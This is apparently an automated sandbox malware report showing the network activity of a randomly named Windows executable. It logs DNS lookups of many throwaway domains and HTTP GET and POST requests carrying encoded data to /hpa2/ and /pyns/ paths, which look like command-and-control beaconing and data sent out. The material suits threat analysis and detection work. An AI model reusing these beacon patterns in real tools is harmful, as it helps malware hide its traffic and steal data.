                                              Jul 1, 2024 16:15:48.657237053 CEST192.168.2.51.1.1.10x95a4Standard query (0)www.tcqlk.comA (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:15:49.657185078 CEST192.168.2.51.1.1.10x95a4Standard query (0)www.tcqlk.comA (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:16:11.176532984 CEST192.168.2.51.1.1.10x612cStandard query (0)www.rlplatro.sbsA (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:16:24.412322044 CEST192.168.2.51.1.1.10xe2d3Standard query (0)www.xsemckm.sbsA (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:16:58.990914106 CEST192.168.2.51.1.1.10x28caStandard query (0)www.b6fbly7u.shopA (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:17:13.286879063 CEST192.168.2.51.1.1.10x297cStandard query (0)www.quantumvoil.xyzA (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:17:26.543052912 CEST192.168.2.51.1.1.10x321Standard query (0)www.transelva.comA (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:17:39.896023989 CEST192.168.2.51.1.1.10x39fStandard query (0)www.gsdaluan.shopA (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:17:53.615484953 CEST192.168.2.51.1.1.10xdd52Standard query (0)www.mommysdaycare.netA (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:18:07.208587885 CEST192.168.2.51.1.1.10xe751Standard query (0)www.203av.comA (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:18:20.867989063 CEST192.168.2.51.1.1.10x5cd2Standard query (0)www.hydrogenmovie.comA (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:18:34.474514961 CEST192.168.2.51.1.1.10xe4f0Standard query (0)www.atmpla.netA (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:18:48.664015055 CEST192.168.2.51.1.1.10xdb60Standard query (0)www.europedriveguide.comA (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:19:02.457811117 CEST192.168.2.51.1.1.10xa48fStandard query (0)www.coinmao.comA (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:19:16.099555016 CEST192.168.2.51.1.1.10x45f3Standard query (0)www.genesiestudios.onlineA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jul 1, 2024 16:15:49.793623924 CEST1.1.1.1192.168.2.50x95a4No error (0)www.tcqlk.com2xin3.zhanghonghong.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 1, 2024 16:15:49.793623924 CEST1.1.1.1192.168.2.50x95a4No error (0)2xin3.zhanghonghong.com122.10.13.122A (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:15:49.793638945 CEST1.1.1.1192.168.2.50x95a4No error (0)www.tcqlk.com2xin3.zhanghonghong.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 1, 2024 16:15:49.793638945 CEST1.1.1.1192.168.2.50x95a4No error (0)2xin3.zhanghonghong.com122.10.13.122A (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:15:49.793643951 CEST1.1.1.1192.168.2.50x95a4No error (0)www.tcqlk.com2xin3.zhanghonghong.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 1, 2024 16:15:49.793643951 CEST1.1.1.1192.168.2.50x95a4No error (0)2xin3.zhanghonghong.com122.10.13.122A (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:16:11.201498032 CEST1.1.1.1192.168.2.50x612cNo error (0)www.rlplatro.sbs109.123.121.243A (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:16:24.956625938 CEST1.1.1.1192.168.2.50xe2d3No error (0)www.xsemckm.sbs47.242.109.15A (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:16:59.545833111 CEST1.1.1.1192.168.2.50x28caNo error (0)www.b6fbly7u.shop121.254.178.238A (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:17:13.314390898 CEST1.1.1.1192.168.2.50x297cNo error (0)www.quantumvoil.xyz203.161.62.199A (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:17:26.694176912 CEST1.1.1.1192.168.2.50x321No error (0)www.transelva.com74.208.236.72A (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:17:40.349975109 CEST1.1.1.1192.168.2.50x39fNo error (0)www.gsdaluan.shop225.jtrhc.funCNAME (Canonical name)IN (0x0001)false
                                              Jul 1, 2024 16:17:40.349975109 CEST1.1.1.1192.168.2.50x39fNo error (0)225.jtrhc.fun192.207.62.21A (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:17:54.083499908 CEST1.1.1.1192.168.2.50xdd52No error (0)www.mommysdaycare.net199.59.243.226A (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:18:07.336246014 CEST1.1.1.1192.168.2.50xe751No error (0)www.203av.com45.207.12.95A (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:18:21.018225908 CEST1.1.1.1192.168.2.50x5cd2No error (0)www.hydrogenmovie.com81.95.96.29A (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:18:35.356607914 CEST1.1.1.1192.168.2.50xe4f0No error (0)www.atmpla.net103.224.182.246A (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:18:48.822694063 CEST1.1.1.1192.168.2.50xdb60No error (0)www.europedriveguide.com72.52.179.174A (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:19:02.626677036 CEST1.1.1.1192.168.2.50xa48fNo error (0)www.coinmao.com192.227.175.142A (IP address)IN (0x0001)false
                                              Jul 1, 2024 16:19:16.237375975 CEST1.1.1.1192.168.2.50x45f3No error (0)www.genesiestudios.onlinegenesiestudios.onlineCNAME (Canonical name)IN (0x0001)false
                                              Jul 1, 2024 16:19:16.237375975 CEST1.1.1.1192.168.2.50x45f3No error (0)genesiestudios.online31.186.11.254A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • www.tcqlk.com
                                              • www.rlplatro.sbs
                                              • www.xsemckm.sbs
                                              • www.b6fbly7u.shop
                                              • www.quantumvoil.xyz
                                              • www.transelva.com
                                              • www.gsdaluan.shop
                                              • www.mommysdaycare.net
                                              • www.203av.com
                                              • www.hydrogenmovie.com
                                              • www.atmpla.net
                                              • www.europedriveguide.com
                                              • www.coinmao.com
                                              • www.genesiestudios.online

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.549722122.10.13.122803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:15:49.808805943 CEST524OUTGET /ndq7/?3hkl=slNhbLXpBjO8vl&4dV43tA=OxZKnWuwsJOrHHhSr0WAKMos2ZEDKwJVMtvq3iaqcpp4OrE8YxBQJzvCfYPSu8gmodsQI/gccX7lRSYJm35OlpLbr+Emqb863it5vTM6q/0fJzxBvxXG8nRUn7++wRvQdA== HTTP/1.1
                                              Host: www.tcqlk.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:16:06.168265104 CEST691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:16:06 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.549727109.123.121.243803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:16:11.211714983 CEST779OUTPOST /hpa2/ HTTP/1.1
                                              Host: www.rlplatro.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.rlplatro.sbs
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.rlplatro.sbs/hpa2/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 77 73 4d 31 33 52 46 68 70 75 4e 42 35 31 78 55 70 59 59 75 42 34 72 48 6f 39 30 48 53 32 69 71 31 61 6d 4d 63 65 4d 4b 7a 34 76 37 65 68 53 57 51 45 51 74 55 36 74 41 76 51 51 78 31 73 35 36 2b 45 42 70 73 49 4d 67 7a 56 47 4b 62 5a 63 4b 47 55 59 45 33 46 44 43 39 69 2f 71 36 53 44 47 71 43 6d 38 4a 56 2b 6b 4d 37 64 64 49 5a 59 42 64 72 45 32 6d 74 50 4d 65 62 39 42 56 6b 45 2b 32 4b 6d 79 75 54 35 4b 34 55 74 39 36 79 61 49 58 32 65 54 36 30 2b 61 32 50 69 71 76 33 6c 42 48 6f 67 76 49 54 48 2f 47 74 51 73 45 78 4e 4c 44 43 7a 7a 73 43 61 31 30 2b 50 61 7a 57 42 79 4e 70 63 49 41 2f 73 3d
                                              Data Ascii: 4dV43tA=wsM13RFhpuNB51xUpYYuB4rHo90HS2iq1amMceMKz4v7ehSWQEQtU6tAvQQx1s56+EBpsIMgzVGKbZcKGUYE3FDC9i/q6SDGqCm8JV+kM7ddIZYBdrE2mtPMeb9BVkE+2KmyuT5K4Ut96yaIX2eT60+a2Piqv3lBHogvITH/GtQsExNLDCzzsCa10+PazWByNpcIA/s=
                                              Jul 1, 2024 16:16:11.813142061 CEST355INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:16:11 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Content-Encoding: gzip
                                              Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.549728109.123.121.243803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:16:13.746309042 CEST799OUTPOST /hpa2/ HTTP/1.1
                                              Host: www.rlplatro.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.rlplatro.sbs
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.rlplatro.sbs/hpa2/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 77 73 4d 31 33 52 46 68 70 75 4e 42 34 56 42 55 76 2f 73 75 4b 34 72 49 30 74 30 48 64 57 6a 43 31 61 69 4d 63 62 68 50 7a 4c 4c 37 64 42 69 57 54 46 51 74 5a 61 74 41 33 67 52 36 6f 38 35 50 2b 45 4d 63 73 4b 49 67 7a 56 53 4b 62 63 67 4b 47 48 67 48 32 56 44 45 77 43 2f 6f 30 79 44 47 71 43 6d 38 4a 56 71 43 4d 37 56 64 49 70 6f 42 63 4b 45 35 76 4e 50 50 5a 62 39 42 43 30 46 57 32 4b 6d 62 75 58 77 74 34 57 56 39 36 77 79 49 57 6b 32 53 78 30 2b 63 38 76 6a 59 76 46 34 56 65 4f 51 63 43 79 7a 33 53 37 59 76 42 48 67 68 5a 67 37 62 2f 69 32 4e 6b 74 48 74 69 6d 67 62 58 4b 4d 34 65 6f 35 63 2f 4c 6c 67 69 47 59 42 41 69 32 79 51 58 69 52 6c 46 51 59
                                              Data Ascii: 4dV43tA=wsM13RFhpuNB4VBUv/suK4rI0t0HdWjC1aiMcbhPzLL7dBiWTFQtZatA3gR6o85P+EMcsKIgzVSKbcgKGHgH2VDEwC/o0yDGqCm8JVqCM7VdIpoBcKE5vNPPZb9BC0FW2KmbuXwt4WV96wyIWk2Sx0+c8vjYvF4VeOQcCyz3S7YvBHghZg7b/i2NktHtimgbXKM4eo5c/LlgiGYBAi2yQXiRlFQY


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.549729109.123.121.243803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:16:16.277179956 CEST1816OUTPOST /hpa2/ HTTP/1.1
                                              Host: www.rlplatro.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.rlplatro.sbs
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.rlplatro.sbs/hpa2/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 77 73 4d 31 33 52 46 68 70 75 4e 42 34 56 42 55 76 2f 73 75 4b 34 72 49 30 74 30 48 64 57 6a 43 31 61 69 4d 63 62 68 50 7a 4c 44 37 64 77 43 57 51 6e 34 74 57 36 74 41 70 51 52 35 6f 38 35 53 2b 45 56 55 73 4b 45 57 7a 58 71 4b 55 61 55 4b 53 6d 67 48 2f 56 44 45 35 69 2f 72 36 53 44 50 71 43 32 34 4a 56 36 43 4d 37 56 64 49 76 45 42 62 62 45 35 6a 74 50 4d 65 62 39 46 56 6b 46 74 32 4f 79 71 75 58 31 61 34 6c 64 39 36 51 69 49 56 58 65 53 38 30 2b 65 2f 76 6a 41 76 46 30 6a 65 4f 6c 6c 43 79 32 73 53 38 55 76 42 67 52 46 4c 68 2b 43 6f 45 2b 69 6d 66 58 50 2f 68 41 57 5a 70 6b 4d 56 59 6c 61 39 5a 68 4d 6e 57 67 73 44 79 72 71 53 69 65 61 74 46 46 7a 2f 45 37 57 42 61 38 71 6a 36 79 5a 52 68 4b 78 55 6e 59 6d 34 71 49 4e 6e 45 78 75 36 2f 61 37 7a 62 52 76 48 74 52 2b 4e 43 31 78 75 78 5a 47 47 6b 73 50 34 34 41 4c 64 4a 42 32 54 74 56 43 74 55 7a 50 75 74 4e 41 56 78 44 55 49 7a 7a 61 2b 50 32 7a 64 71 55 79 57 54 45 44 7a 76 79 55 38 67 2b 76 62 77 43 31 55 73 33 50 54 36 [TRUNCATED]
                                              Data Ascii: 4dV43tA=wsM13RFhpuNB4VBUv/suK4rI0t0HdWjC1aiMcbhPzLD7dwCWQn4tW6tApQR5o85S+EVUsKEWzXqKUaUKSmgH/VDE5i/r6SDPqC24JV6CM7VdIvEBbbE5jtPMeb9FVkFt2OyquX1a4ld96QiIVXeS80+e/vjAvF0jeOllCy2sS8UvBgRFLh+CoE+imfXP/hAWZpkMVYla9ZhMnWgsDyrqSieatFFz/E7WBa8qj6yZRhKxUnYm4qINnExu6/a7zbRvHtR+NC1xuxZGGksP44ALdJB2TtVCtUzPutNAVxDUIzza+P2zdqUyWTEDzvyU8g+vbwC1Us3PT6K5dtvwKha54kftS1g0FVRkg4p1O2lQ0JxFe/lmMpInwtQenMYaAXM6idCuz6irRGzNKruFq9OCHuK9b5YQxHShIDtypkFVn+1wUKVfzjx1UBCYm8hMARk8qq11FNSMvmSlLaIZi6bUWsPCDVtPYFML+qPAqW1LYhEoj5Gb8o3xLUYiF0Zn2fQzN5Vy7fiUlZJH4EGa3lGCrwuXBsHTOFkivEEr5srHKdHhPCaJR6xprszTUMXeK+If3P5G3wzeSZz7ThSbXeO66wnxthX54IoPfHSRewddCtKD/Too6bHT/2yomgj9ZPr2GQOp9QH27afP39I5iACkBiH2eMKk57gTvt9zS182wt+F8liAFMFavYUWvVUswg9ZQ4jxR/v/9X2aiXx4bQEvtsdBCx9Hkx4l9oLZbDSCfkIZraPAfH+gPZ122Vx7hKWUbYdiSwHqy4xtOB0cXLFouVqzUFt6bGIBdql6CfID19bR6mk3CHf39J7QpUzVgQeGeGvUGp5vOeYoWnPLJ3R4yujXNLJmBv07UFFOKyhsVWJs+zcmL3GkUhi0PoWQq1fvDYKfshOBqUeCYtxMXZhTIaWgqxc3EUGuFV254QXCjgHUtFGg0x0JakLbJMJjYkAxRxgmN7TxA3fknpU7mSdFkw/eE2QgUj7U/FovSLQeX1T8 [TRUNCATED]
                                              Jul 1, 2024 16:16:16.870628119 CEST355INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:16:16 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Content-Encoding: gzip
                                              Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.549731109.123.121.243803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:16:18.808053017 CEST527OUTGET /hpa2/?4dV43tA=9ukV0lom1Pkt5UJj/K4lBand6ck4dRKkyq6RFoVD1IbXcSjkOX57QIVSlkgD3OdjwHZgiaAyrGOMfaVTdV8W+y7+gTzt+hDR2BCzfmmCLLxuXIcFaZwChPWJYJEFenE0lA==&3hkl=slNhbLXpBjO8vl HTTP/1.1
                                              Host: www.rlplatro.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:16:19.403414011 CEST691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:16:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.54973347.242.109.15803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:16:24.966593027 CEST776OUTPOST /pyns/ HTTP/1.1
                                              Host: www.xsemckm.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.xsemckm.sbs
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.xsemckm.sbs/pyns/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 48 33 73 6d 48 57 47 39 77 6d 66 55 68 2b 44 6f 39 30 44 57 4c 37 79 6e 72 74 4a 50 37 35 74 4c 71 61 52 42 33 56 38 73 77 64 34 30 48 7a 56 74 56 6e 6b 73 62 62 6d 74 49 36 2b 35 55 69 68 53 6a 74 4b 49 56 31 63 72 57 56 61 68 30 4c 6a 75 32 41 4b 4b 41 56 79 6f 38 7a 6c 35 65 4a 75 75 70 4e 76 56 72 44 67 54 59 66 69 74 42 79 5a 69 50 4d 41 56 4a 78 32 47 54 59 50 4f 51 71 4d 47 76 2b 59 76 68 4a 52 4f 7a 57 67 6d 34 49 51 43 79 38 2b 39 6b 31 4a 78 39 47 65 4c 57 6b 61 51 77 68 6c 76 32 58 34 79 45 74 4e 6a 59 44 5a 4e 43 42 66 71 6b 70 56 4b 6d 69 6b 4a 31 7a 68 2f 73 33 37 54 42 45 6f 3d
                                              Data Ascii: 4dV43tA=H3smHWG9wmfUh+Do90DWL7ynrtJP75tLqaRB3V8swd40HzVtVnksbbmtI6+5UihSjtKIV1crWVah0Lju2AKKAVyo8zl5eJuupNvVrDgTYfitByZiPMAVJx2GTYPOQqMGv+YvhJROzWgm4IQCy8+9k1Jx9GeLWkaQwhlv2X4yEtNjYDZNCBfqkpVKmikJ1zh/s37TBEo=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.54973447.242.109.15803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:16:27.495388985 CEST796OUTPOST /pyns/ HTTP/1.1
                                              Host: www.xsemckm.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.xsemckm.sbs
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.xsemckm.sbs/pyns/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 48 33 73 6d 48 57 47 39 77 6d 66 55 67 64 72 6f 2f 58 37 57 61 4c 79 6b 33 39 4a 50 78 5a 74 50 71 61 64 42 33 52 45 61 77 4f 51 30 47 57 70 74 55 6a 49 73 59 62 6d 74 44 61 2b 34 4b 53 68 4a 6a 74 48 39 56 30 67 72 57 54 32 68 30 4f 48 75 32 78 4b 4e 50 6c 79 75 33 54 6c 2f 42 5a 75 75 70 4e 76 56 72 44 6b 35 59 66 4b 74 42 43 70 69 49 5a 30 57 53 52 32 48 53 59 50 4f 55 71 4d 43 76 2b 59 64 68 49 4d 62 7a 54 38 6d 34 4e 30 43 78 6f 71 36 39 46 4a 37 67 57 66 30 66 32 58 4c 30 43 56 32 72 57 78 4f 66 37 39 71 51 56 30 6e 59 6a 58 43 33 4a 35 79 32 78 73 2b 6b 44 41 57 32 55 72 6a 66 54 39 41 36 2b 49 6e 4a 2b 43 33 4f 73 32 61 39 68 49 50 35 32 47 48
